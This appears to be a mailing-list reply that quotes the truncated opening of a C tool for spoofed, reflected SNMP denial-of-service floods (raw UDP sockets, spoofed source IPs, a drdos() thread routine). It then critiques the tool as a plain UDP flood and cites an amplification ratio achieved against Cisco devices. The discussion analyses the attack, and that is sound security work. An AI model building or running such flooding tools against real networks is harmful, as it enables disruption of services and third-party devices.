/* For educational purposes only */
/* The author of this code is not responsible for the use of this proof of concept tool */
#include <stdio.h>
#include <netinet/ip.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/udp.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <asm/types.h>
#include <pthread.h>
//#define DEBUG // uncomment if you want to see debugging messages
#define MAXTHREADS 4 // Maximum number of threads
#define SNMPPORT 161 // Destination SNMP port (default)
struct args {
int socket;
char *filename;
unsigned int srcip;
unsigned int dstip;
}args;
unsigned short in_cksum(unsigned short *addr,int len);
void send_udp(int sfd,unsigned int src,unsigned short src_p,
unsigned int dst,unsigned short dst_p,char *buffer,int len);
void *drdos();
void add_snmp_s(void);
int snmp_s_length(struct snmp_s* list);
void push_ip(struct snmp_s** first_s_ref, unsigned int ip);
unsigned short in_cksum(unsigned short *addr,int len)
{
register int nleft=len;
register unsigned short *w=addr;
register int sum=0;
unsigned short answer=0;
The quoted code is actually nothing more than a regular threaded UDP
flood DoS tool, both SNMP spoofed requests and responses are equally 65
bytes (no reflection). Make a simple network capture for verification.
The payload is a mis-used .1.3.6.1 getBulk SNMP request resulting in a
null value response.
A sample perl script with the biggest reflection factor per transaction
achieved on Cisco devices is available here [1] (Amplification = 84
bytes request / 1480 bytes response).
For more information about SNMP reflection DoS you may refer to this
link [2].
The quoted code reminds me an old implementation on the same concept [3].